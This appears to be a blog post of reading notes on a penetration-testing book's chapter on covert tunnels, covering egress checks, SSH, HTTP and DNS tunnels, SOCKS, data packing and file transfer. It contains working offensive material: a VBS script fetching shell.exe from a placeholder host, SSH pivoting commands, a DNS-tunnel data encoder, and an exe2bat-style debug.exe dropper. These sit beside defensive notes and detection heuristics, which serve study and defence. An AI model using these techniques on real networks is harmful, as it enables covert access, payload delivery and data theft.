Foreword
This article continues my reading notes on "Intranet Security Attack and Defense: Penetration Testing Practical Guide". It covers chapter 3, hidden communication tunnel technology, which introduces in detail the use of IPv6 tunnels, ICMP tunnels, HTTPS tunnels, SSH tunnels, DNS tunnels and other encrypted tunnels, and explains the common SOCKS proxy tools and intranet upload/download methods.
I studied and sorted out related knowledge earlier; see: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning
1. Basic knowledge
1. Overview
A hidden communication tunnel is the attacker's main channel for moving commands and data to and from a compromised host once a foothold exists.
When ordinary TCP and UDP traffic is intercepted or filtered by defensive systems, protocols that are hard to block outright, such as DNS and ICMP, are used instead, and they have become the main carriers of attackers' command-and-control tunnels.
Commonly used tunnels:
- Network layer: IPv6 tunnel, ICMP tunnel, GRE tunnel
- Transport layer: TCP tunnel, UDP tunnel, regular port forwarding
- Application layer: SSH tunnel, HTTP tunnel, HTTPS tunnel, DNS tunnel
2. Determine the connectivity of the intranet
Before choosing a tunnel, find out which protocols the compromised host can use to reach the outside. The checks are:
//ICMP protocol
ping www.baidu.com
//TCP protocol (-z: scan without sending data, -v: verbose)
nc -zv 192.168.1.10 80
//HTTP protocol
curl www.baidu.com:80
//curl through a proxy, for intranets that only reach the outside via a proxy server
curl -x proxy-ip:port www.baidu.com
//DNS protocol: query your own server (vps-ip), so that the query arriving there proves DNS egress even if the answer is filtered
//nslookup on Windows
nslookup www.baidu.com vps-ip
//dig on Linux
dig @vps-ip www.baidu.com
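The same checks can be scripted so that one run on the foothold host reports which protocols get out. The following probe is an added example, not code from the book or the original post: it mirrors the manual commands above (ICMP through the system ping, a TCP handshake, an HTTP request with or without a proxy, and a raw DNS query to a chosen server) with explicit timeouts. The 127.0.0.1 listener helpers at the bottom exist only so the probes can be exercised offline; vps-ip, proxy-ip and the test hosts are placeholders.

```python
"""Outbound connectivity probe for a compromised host.

Added example; not code from the book or the original post. It automates the
manual checks (ICMP via the system ping, TCP, HTTP with or without a proxy, DNS
against a chosen server) with explicit timeouts. The 127.0.0.1 helpers exist
only to exercise the probes offline; vps-ip and proxy-ip are placeholders.
"""
import http.server
import platform
import socket
import subprocess
import threading
import urllib.error
import urllib.request

def icmp_reachable(host, timeout=2):
    """Like `ping host`; ICMP needs raw sockets, so the system ping is called."""
    if platform.system() == "Windows":
        cmd = ["ping", "-n", "1", "-w", str(timeout * 1000), host]   # -w is milliseconds
    else:
        cmd = ["ping", "-c", "1", "-W", str(timeout), host]          # -W is seconds on Linux
    try:
        return subprocess.run(cmd, capture_output=True, timeout=timeout + 3).returncode == 0
    except (OSError, subprocess.TimeoutExpired):
        return False

def tcp_reachable(host, port, timeout=3.0):
    """Like `nc -zv host port`: True only if the TCP handshake completes."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

def http_reachable(url, timeout=3.0, proxy=None):
    """Like `curl url`, or `curl -x proxy url` with proxy="http://proxy-ip:port".
    Any HTTP status counts as open; only connection errors or timeouts count as blocked."""
    # explicit ProxyHandler: ignore http_proxy env vars unless a proxy is passed on purpose
    proxies = {"http": proxy, "https": proxy} if proxy else {}
    opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))
    try:
        with opener.open(url, timeout=timeout) as resp:
            return resp.status > 0
    except urllib.error.HTTPError:
        return True                      # 4xx/5xx still proves an HTTP server answered
    except (OSError, ValueError):
        return False

def build_dns_query(name, txid=0x1234):
    """Minimal RFC 1035 A query: 12-byte header (RD set), QNAME labels, QTYPE=A, QCLASS=IN."""
    header = txid.to_bytes(2, "big") + b"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split(".")) + b"\x00"
    return header + qname + b"\x00\x01\x00\x01"

def dns_reachable(server, name="www.baidu.com", timeout=3.0):
    """Like `dig @server name` / `nslookup name server`: a raw UDP/53 query matched on
    transaction id. Aimed at your own VPS, an arriving query proves DNS egress (so a DNS
    tunnel is possible) even when the answer is rewritten on the way back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        try:
            s.sendto(build_dns_query(name, 0x4242), (server, 53))
            data, _ = s.recvfrom(512)
            return data[:2] == b"\x42\x42"
        except OSError:
            return False

# constructed 127.0.0.1 endpoints, used only to self-test the probes offline
class _OkHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok")

def start_local_tcp_listener():
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    threading.Thread(target=srv.accept, daemon=True).start()
    return srv.getsockname()[1]

def start_local_http_server():
    httpd = http.server.HTTPServer(("127.0.0.1", 0), _OkHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd.server_address[1]

def closed_local_port():
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port

if __name__ == "__main__":
    print("ICMP", icmp_reachable("www.baidu.com"))
    print("TCP ", tcp_reachable("192.168.1.10", 80))
    print("HTTP", http_reachable("http://www.baidu.com:80"))
    print("DNS ", dns_reachable("vps-ip"))
```

A False from every probe except dns_reachable against your own server is exactly the situation the rest of this chapter is about: only a DNS (or ICMP) tunnel will work. Note that the ICMP check needs ping on the PATH and that dns_reachable bypasses the system resolver on purpose.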
2. Network Layer Tunneling Technology
1. IPv6 tunnel
An IPv6 tunnel uses IPv4 as the carrier: the whole IPv6 packet is encapsulated in the payload of an IPv4 packet, so IPv6 traffic can cross an IPv4-only network, and it also passes devices that only inspect IPv4 traffic.
Several tools:
2. ICMP tunnel
With most protocols, two devices need an open port on at least one side to communicate; ICMP has no ports, so an ICMP tunnel (data carried in the payload of echo request/reply packets) needs none, and it gets through wherever ping is allowed.
See also: Intranet penetration series: ICMP tunnel of intranet tunnel
3. Transport Layer Tunneling Technology
Mainly TCP tunnels, UDP tunnels and ordinary port forwarding. Most of these are blocked, because they are plain connections on arbitrary ports that a firewall policy can simply deny.
Tools can be found in: Intranet Penetration Series: Intranet Penetration (Tunnel) Learning
4. Application Layer Tunneling Technology
1. SSH tunnel
Almost all Linux/UNIX servers and network devices support SSH. SSH traffic is encrypted and is normally allowed through firewalls and border devices, so attackers often carry other protocols over it.
//Local forwarding: the VPS listens on 1153; connections to it go through the jump host to 1.1.1.10:3389
ssh -CfNg -L 1153(VPS port):1.1.1.10(target IP):3389(target port) [email protected](jump host)
//Remote forwarding: run from the jump host, it makes the VPS listen on 3307 and forward back through the jump host to 1.1.1.10:3389
ssh -CfNg -R 3307(VPS port):1.1.1.10(target IP):3389(target port) [email protected]
-L local port forwarding, -R remote port forwarding, -D dynamic forwarding (a SOCKS proxy on the local port). The other options: -C compress the traffic, -f go to the background after authentication, -N do not run a remote command (forwarding only), -g let other hosts connect to the forwarded port instead of only localhost.
Defense:
- IP whitelists on the SSH service
- ACLs restricting which source IPs may open SSH connections
- Move SSH management entirely to an out-of-band management network
- Set AllowTcpForwarding no in sshd_config on hosts that do not need forwarding, so a stolen account cannot be used as a pivot
2. HTTP/HTTPS tunnel
Well-known tools: reGeorg and Tunna (you upload a server-side script such as a JSP, ASPX or PHP page to the compromised web server, and TCP connections are then tunnelled inside ordinary HTTP requests to that page, typically exposed locally as a SOCKS proxy), and Meterpreter's reverse_http/reverse_https transports. With HTTPS the tunnel content cannot be inspected without TLS interception at the border.
3. DNS tunnel
DNS is an essential service that is almost never blocked, so DNS packets can pass through firewalls that block everything else.
Seen from the DNS protocol, the client just queries names under one specific domain over and over and receives answers. The difference is in the content: the query names carry outbound data encoded into subdomain labels, and where a normal answer would be an IP address the tunnel server returns arbitrary data (for example in TXT or CNAME records), including encrypted C2 commands.
The essence of DNS tunneling is encapsulating another protocol inside DNS queries and responses. Each query is small and resolvers cache answers, so throughput is low and the attacker needs an authoritative zone under their control; the unusually long, high-entropy subdomains and the query volume towards one zone are also what defenders look for.
See: Intranet Penetration Series: DNS Tunnel of Intranet Tunnel
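The mechanism described above, as an added example that is not code from the book, the post or any DNS tunnel tool: the client base32-encodes its data into the subdomain labels of queries for an attacker-controlled zone, respecting the 63-character label and 253-character name limits of DNS, and the server reassembles the data from the names it receives. The same block contains the detection heuristic a defender would run over DNS query logs: many distinct, long, high-entropy subdomains under one zone. The zone t.example.com, the payload and the list of "normal" queries are constructed for the example; payload encryption and the answer (downstream) direction are left out.

```python
"""DNS tunnel transport: data in query names, plus a detector for the pattern.

Added example; not code from the book or the original post. The client
base32-encodes its data into the subdomain labels of queries for an
attacker-controlled zone and the server reassembles it from the names it sees.
Encryption and the downstream (answer) direction are left out. The zone, the
payload and the "normal" query list are all constructed for the example.
"""
import base64
import collections
import math

ZONE = "t.example.com"   # constructed: the attacker's authoritative zone
MAX_LABEL = 63           # RFC 1035: one label is at most 63 characters
MAX_NAME = 253           # and a whole name at most 253 characters in text form


def encode_chunks(data: bytes, zone: str = ZONE, seq: int = 0) -> list:
    """Client side: split *data* into query names <seq>.<b32 labels...>.<zone>.
    The sequence label orders the chunks and makes every name unique, so a caching
    resolver forwards each query instead of answering from its cache."""
    # base32 uses only a-z2-7; lower-case because DNS is case-insensitive
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    room = MAX_NAME - len(zone) - 1 - 7                # minus ".zone" and "000000."
    per_name = (room // (MAX_LABEL + 1)) * MAX_LABEL   # b32 chars that fit in one name
    names, pos = [], 0
    while pos < len(b32) or not names:
        piece = b32[pos:pos + per_name]
        labels = [piece[i:i + MAX_LABEL] for i in range(0, len(piece), MAX_LABEL)]
        names.append(".".join([f"{seq:06d}"] + labels + [zone]))
        pos, seq = pos + per_name, seq + 1
    return names


def decode_names(names: list, zone: str = ZONE) -> bytes:
    """Server side: keep only queries for our zone, order by sequence, rejoin, decode."""
    suffix = "." + zone.lower()
    pieces = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        pieces[int(labels[0])] = "".join(labels[1:])
    b32 = "".join(pieces[k] for k in sorted(pieces))
    return base64.b32decode(b32.upper() + "=" * (-len(b32) % 8))


def shannon_entropy(s: str) -> float:
    """Bits per character: base32 data is close to 5, real hostnames far lower."""
    if not s:
        return 0.0
    counts = collections.Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def flag_tunnel_zones(queries, min_unique=10, min_avg_len=30, min_entropy=3.5) -> dict:
    """Detection heuristic over query names (e.g. from resolver logs): group by the last
    two labels and flag zones that receive many distinct, long, high-entropy subdomains.
    Returns {zone: (unique_subdomains, avg_len, entropy)}."""
    by_zone = collections.defaultdict(set)
    for q in queries:
        parts = q.lower().rstrip(".").split(".")
        if len(parts) > 2:
            by_zone[".".join(parts[-2:])].add(".".join(parts[:-2]))
    flagged = {}
    for zone, subs in by_zone.items():
        if len(subs) < min_unique:
            continue
        avg_len = sum(map(len, subs)) / len(subs)
        ent = shannon_entropy("".join(subs))
        if avg_len >= min_avg_len and ent >= min_entropy:
            flagged[zone] = (len(subs), round(avg_len, 1), round(ent, 2))
    return flagged


if __name__ == "__main__":
    payload = bytes(range(256)) * 8           # constructed 2 KB of "exfiltrated" data
    names = encode_chunks(payload)
    print(len(names), "queries, longest name", max(map(len, names)), "chars")
    assert decode_names(names) == payload
    normal = ["www.baidu.com", "mail.google.com", "cdn.example.com", "login.microsoft.com"] * 5
    print(flag_tunnel_zones(normal + names))   # only example.com is flagged
```

The thresholds in flag_tunnel_zones are illustrative; in practice they are tuned per resolver, and CDN and anti-virus update domains, which also produce long machine-generated labels, need to be whitelisted.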
5. SOCKS proxy
SOCKS is short for "SOCKetS"
- SOCKS4 supports only TCP, carries only an IPv4 destination address and has no real authentication (its "user id" field is never verified); SOCKS4a added hostname destinations
- SOCKS5 (RFC 1928) supports TCP and UDP (UDP ASSOCIATE), IPv4, IPv6 and hostname destinations, and negotiates an authentication method (none, username/password per RFC 1929, GSSAPI)
A SOCKS proxy works at the session layer, below the application protocols, while an HTTP proxy works at the application layer. A SOCKS proxy therefore relays any TCP (or UDP) connection without understanding it, whereas an HTTP proxy only serves clients that speak HTTP (and HTTPS via CONNECT). Because it never parses the higher-level protocol, a SOCKS proxy is also lighter and usually faster.
Socket versus SOCKS: a socket is a programming interface (API) through which a program talks to the network; it is named by an IP address and port, is the handle of one communication link, and is in essence an encapsulation of TCP/IP. SOCKS is a proxy protocol, the latest version being SOCKS5; a proxy is a relay through which you reach the network indirectly. In short, a socket is an API for building connections, and SOCKS is a protocol, a defined set of messages.
The book groups VPN tunnelling protocols into four: the Point-to-Point Tunneling Protocol PPTP, the Layer 2 Tunneling Protocol L2TP, the network-layer protocol IPsec, and SOCKS v5. PPTP and L2TP work at the data link layer, IPsec at the network layer, and SOCKS v5 at the session layer.
Examples of tools: EarthWorm (ew; its successor is Termite), reGeorg, sSocks, SocksCap64 and SSTap, Proxifier, ProxyChains (the last four are "socksifiers" that push an ordinary client's traffic through a SOCKS proxy)
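The protocol difference between SOCKS4 and SOCKS5 is easiest to see on the wire. The following is an added example, not code from the book, the post or any of the tools listed: pure byte-level functions for the SOCKS5 greeting, method selection, CONNECT request and reply (RFC 1928) and the SOCKS4 CONNECT request, plus an in-memory run of the client/proxy exchange. The hostnames and addresses are made up; the username/password sub-negotiation of RFC 1929 and UDP ASSOCIATE are not implemented.

```python
"""SOCKS4 vs SOCKS5 on the wire: the handshake messages, built and parsed.

Added example; not code from the book, the post or any of the tools listed
above. Pure byte-level functions for the SOCKS5 greeting, method selection,
CONNECT request and reply (RFC 1928) and the SOCKS4 CONNECT request, so the
differences can be seen directly: SOCKS4 carries only an IPv4 address and an
unverified user id, SOCKS5 negotiates authentication and accepts hostnames
and IPv6. RFC 1929 user/password sub-negotiation and UDP ASSOCIATE are left
out. Hosts and addresses are made up.
"""
import ipaddress
import struct

NO_AUTH, USER_PASS, NO_ACCEPTABLE = 0x00, 0x02, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04


def socks5_greeting(methods=(NO_AUTH, USER_PASS)) -> bytes:
    """Client -> proxy: VER=5, NMETHODS, METHODS (the auth methods the client can do)."""
    return bytes([0x05, len(methods), *methods])


def socks5_select_method(greeting: bytes, offered=(NO_AUTH,)) -> bytes:
    """Proxy -> client: VER, METHOD. The first client method the proxy also allows wins;
    0xFF means no acceptable method and the client must close the connection."""
    if len(greeting) < 2 or greeting[0] != 0x05 or len(greeting) != 2 + greeting[1]:
        raise ValueError("malformed SOCKS5 greeting")
    chosen = next((m for m in greeting[2:] if m in offered), NO_ACCEPTABLE)
    return bytes([0x05, chosen])


def socks5_connect(host: str, port: int) -> bytes:
    """Client -> proxy: VER CMD RSV ATYP DST.ADDR DST.PORT. A hostname is sent as-is
    (ATYP 3) and resolved by the proxy: with a SOCKS proxy inside the intranet this is
    what lets you reach internal names that your own machine cannot resolve."""
    try:
        ip = ipaddress.ip_address(host)
        addr = bytes([ATYP_IPV4 if ip.version == 4 else ATYP_IPV6]) + ip.packed
    except ValueError:
        raw = host.encode()
        if len(raw) > 255:
            raise ValueError("hostname longer than 255 bytes")
        addr = bytes([ATYP_DOMAIN, len(raw)]) + raw
    return bytes([0x05, CMD_CONNECT, 0x00]) + addr + struct.pack("!H", port)


def socks5_parse_request(req: bytes):
    """Proxy side: return (cmd, host, port) from a SOCKS5 request, or raise on junk."""
    if len(req) < 4 or req[0] != 0x05:
        raise ValueError("not a SOCKS5 request")
    cmd, atyp = req[1], req[3]
    if atyp == ATYP_IPV4:
        host, rest = str(ipaddress.IPv4Address(req[4:8])), req[8:]
    elif atyp == ATYP_IPV6:
        host, rest = str(ipaddress.IPv6Address(req[4:20])), req[20:]
    elif atyp == ATYP_DOMAIN:
        n = req[4]
        host, rest = req[5:5 + n].decode(), req[5 + n:]
    else:
        raise ValueError("unknown ATYP %d" % atyp)
    if len(rest) != 2:
        raise ValueError("bad request length")
    return cmd, host, struct.unpack("!H", rest)[0]


def socks5_reply(rep: int = 0x00, bind_ip: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    """Proxy -> client: VER REP RSV ATYP BND.ADDR BND.PORT; REP 0 = succeeded, after
    which the same socket carries the target's bytes unchanged."""
    return (bytes([0x05, rep, 0x00, ATYP_IPV4]) + ipaddress.IPv4Address(bind_ip).packed
            + struct.pack("!H", bind_port))


def socks4_connect(ip: str, port: int, userid: bytes = b"") -> bytes:
    """SOCKS4 CONNECT: VN=4 CD=1 DSTPORT DSTIP USERID NUL. Only an IPv4 address fits
    (SOCKS4a added a hostname workaround), and USERID is just a string the proxy may
    log; there is no authentication exchange at all."""
    return (bytes([0x04, 0x01]) + struct.pack("!H", port)
            + ipaddress.IPv4Address(ip).packed + userid + b"\x00")


def negotiate(host, port, client_methods=(NO_AUTH, USER_PASS), proxy_offers=(NO_AUTH,)):
    """Run the client/proxy exchange in memory. Returns the proxy's view of the target
    (cmd, host, port), or None when no authentication method is acceptable. If the
    proxy picked USER_PASS a real client would now do the RFC 1929 sub-negotiation."""
    choice = socks5_select_method(socks5_greeting(client_methods), proxy_offers)
    if choice[1] == NO_ACCEPTABLE:
        return None
    request = socks5_connect(host, port)       # client sends this after the method choice
    return socks5_parse_request(request)       # proxy resolves/opens the target from it


if __name__ == "__main__":
    print(socks5_greeting().hex(), socks5_connect("fileserver.corp", 445).hex())
    print(negotiate("fileserver.corp", 445))
    print(negotiate("fileserver.corp", 445, client_methods=(NO_AUTH,), proxy_offers=(USER_PASS,)))
    print(socks4_connect("10.0.0.5", 3389, b"ew").hex())
```

The practical consequence for pivoting: with SOCKS4 your tool must already know the target's IPv4 address, while with SOCKS5 you can hand the proxy an intranet hostname and let the compromised host resolve it (ProxyChains calls this proxy_dns).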
6. Compressed data
1. rar.exe
Package everything in the E:\webs\ directory into 1.rar in the same directory (a: add, -k: lock the archive, -r: recurse into subdirectories, -s: solid archive, -m3: normal compression)
rar.exe a -k -r -s -m3 E:\webs\1.rar E:\webs\
Extract E:\webs\1.rar into the current directory (e drops the stored paths; use x to keep them)
rar.exe e E:\webs\1.rar
Pack all files and folders under E:\API into volumes of 20 MB each (-m0: store only, no compression; -v20m: volume size)
rar.exe a -m0 -r -v20m E:\test.rar E:\API
Extract the volume set starting at E:\test.part01.rar into E:\x1 on the E drive (the destination must end with a backslash, otherwise rar treats it as a file name)
rar.exe x E:\test.part01.rar E:\x1\
2. 7-Zip
Package everything in the E:\webs\ directory into 1.7z, protected with the password 12345 (-r: recurse, -p: password; 7-Zip has no -k switch). Without -mhe=on only the contents are encrypted and the file names stay readable in the listing
7z.exe a -r -p12345 E:\webs\1.7z E:\webs\
Extract E:\webs\1.7z into the current directory
7z.exe e -p12345 E:\webs\1.7z
Pack all files and folders under E:\API into 20 MB volumes with the password admin (documented form: the command letter first, then the switches; -v20m: volume size)
7z.exe a -r -v20m -padmin E:\test.7z E:\API
Extract the volume set starting at E:\test.7z.001 (7-Zip numbers volumes .001, .002, ...) into E:\x1 on the E drive (-o takes the path with no space)
7z.exe x -padmin E:\test.7z.001 -oE:\x1
7. Upload and download
1、VBS
Run the following on the target host to download shell.exe (cscript is built into Windows):
cscript download.vbs
download.vbs code (comments added):
' download.vbs: fetch http://IP/shell.exe with MSXML and write it to disk via ADODB.Stream
Set post = CreateObject("Msxml2.XMLHTTP")
Set shell = CreateObject("Wscript.Shell")   ' not used below; keep it if you want shell.Run to start the file afterwards
post.Open "GET", "http://IP/shell.exe", 0   ' 0 = synchronous, so responseBody is complete after Send
post.Send
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3                               ' adModeReadWrite
aGet.Type = 1                               ' adTypeBinary
aGet.Open
aGet.Write post.responseBody
aGet.SaveToFile "C:\test\shell.exe", 2      ' adSaveCreateOverWrite; the C:\test directory must already exist
aGet.Close
2. Debug upload
First convert the EXE to hexadecimal, then write the hex into a file on the target with echo commands, and finally use debug.exe on the target to turn the hex back into an EXE.
In Kali Linux, exe2bat.exe is in the /usr/share/windows-binaries directory. Run
wine exe2bat.exe ew.exe ew.txt
to convert ew.exe into ew.txt, a list of echo commands that write the hex file and then call debug.
Then paste the contents of ew.txt into the target system's command line: the echo commands recreate the hex file there, and debug.exe rebuilds ew.exe from it.
Two limits: debug.exe is a 16-bit program, so it only exists on 32-bit Windows (64-bit Windows does not ship it), and it can only write files smaller than 64 KB.
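The conversion itself is simple enough to reimplement, which also makes the 64 KB limit concrete. The following is an added example, not the exe2bat.exe tool from Kali and not code from the book: it turns a binary into a debug.exe script (n / e / rcx / w / q commands; the one-line form of the e command is assumed, so exe2bat's exact layout may differ), wraps it in echo lines for pasting into cmd.exe, and includes a parser for the same script format so the output can be verified on any system without running debug.exe. The sample binary is constructed.

```python
"""exe2bat in Python: echo lines that rebuild a small binary with debug.exe.

Added example; not the exe2bat.exe tool from Kali and not code from the book.
The debug script uses these commands (one-line form of `e` assumed; exe2bat's
exact layout may differ):
  n <name>               file name to write
  e <offset> <hex...>    enter bytes at <offset>; debug loads data at 0x100
  rcx / <hex size>       set CX to the file length, which `w` uses
  w / q                  write the file, quit
A parser for the same format lets you verify the output without Windows.
"""
MAX_SIZE = 0x10000 - 0x100   # 16-bit debug.exe works in one segment, data from 0x100
BYTES_PER_LINE = 32          # 7 + 32*3 = 103 chars per `e` line, under cmd/debug line limits


def fits_in_debug(size: int) -> bool:
    """debug.exe can only write files up to 64 KB minus the 0x100 load offset."""
    return 0 < size <= MAX_SIZE


def build_debug_script(data: bytes, out_name: str) -> list:
    """Return the debug.exe script lines that recreate *data* as *out_name*."""
    if not fits_in_debug(len(data)):
        raise ValueError(f"{len(data)} bytes: debug.exe writes 1..{MAX_SIZE} bytes only")
    lines = [f"n {out_name}"]
    for off in range(0, len(data), BYTES_PER_LINE):
        chunk = data[off:off + BYTES_PER_LINE]
        lines.append(f"e {0x100 + off:04x} " + " ".join(f"{b:02x}" for b in chunk))
    lines += ["rcx", f"{len(data):04x}", "w", "q"]
    return lines


def to_batch(script_lines: list, hex_file: str = "123.hex") -> str:
    """Wrap each script line in an echo that appends to *hex_file* (this is what gets
    pasted into the target's cmd.exe), then run debug on it and delete it."""
    bat = [f"echo {line} >>{hex_file}" for line in script_lines]
    bat += [f"debug<{hex_file}>nul", f"del {hex_file}"]
    return "\r\n".join(bat) + "\r\n"


def parse_debug_script(script_lines: list) -> bytes:
    """Offline check: interpret n/e/rcx/w lines and return the bytes debug would write."""
    buf, size = bytearray(), None
    it = iter(script_lines)
    for line in it:
        parts = line.split()
        if parts[0] == "e":
            off = int(parts[1], 16) - 0x100
            chunk = bytes(int(h, 16) for h in parts[2:])
            if off > len(buf):                      # writes may leave a hole; zero-fill it
                buf.extend(b"\x00" * (off - len(buf)))
            buf[off:off + len(chunk)] = chunk
        elif parts[0] == "rcx":
            size = int(next(it), 16)                # the value follows on the next line
    if size is None:
        raise ValueError("script never sets CX, debug would write 0 bytes")
    return bytes(buf[:size].ljust(size, b"\x00"))


if __name__ == "__main__":
    sample = b"MZ\x90\x00" + bytes(range(256)) * 4      # constructed stand-in for ew.exe
    script = build_debug_script(sample, "ew.exe")
    assert parse_debug_script(script) == sample
    print(to_batch(script)[:200])
```

Because the technique writes the file through echo and debug.exe rather than any network download, it is worth noting for detection that the resulting batch is thousands of near-identical `echo ... >>` lines followed by `debug<`, a pattern that is easy to alert on in command-line logging.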
3. Other
You can also upload files with these:
- Nishang: on the attacker side, convert the EXE to be uploaded into text (hexadecimal) form with Nishang's ExetoText script, write that text onto the target with echo commands, then run the Download_Execute script on the target to fetch the text file, convert it back into an EXE and execute it
- bitsadmin: recommended on Windows 7 and Windows 8 hosts. BITS transfers over HTTP and HTTPS (and SMB) but not FTP, and the bitsadmin tool is not available on Windows XP/Server 2003 and earlier. Its jobs survive reboots and are listed by bitsadmin /list, which is also where defenders can spot them
- PowerShell downloads, for example (New-Object Net.WebClient).DownloadFile($url, $path) or Invoke-WebRequest
Epilogue
This chapter is mainly about hidden communication tunnels. Since I have studied this material before, it is not recorded in detail here; for the details, see the other related articles on this blog.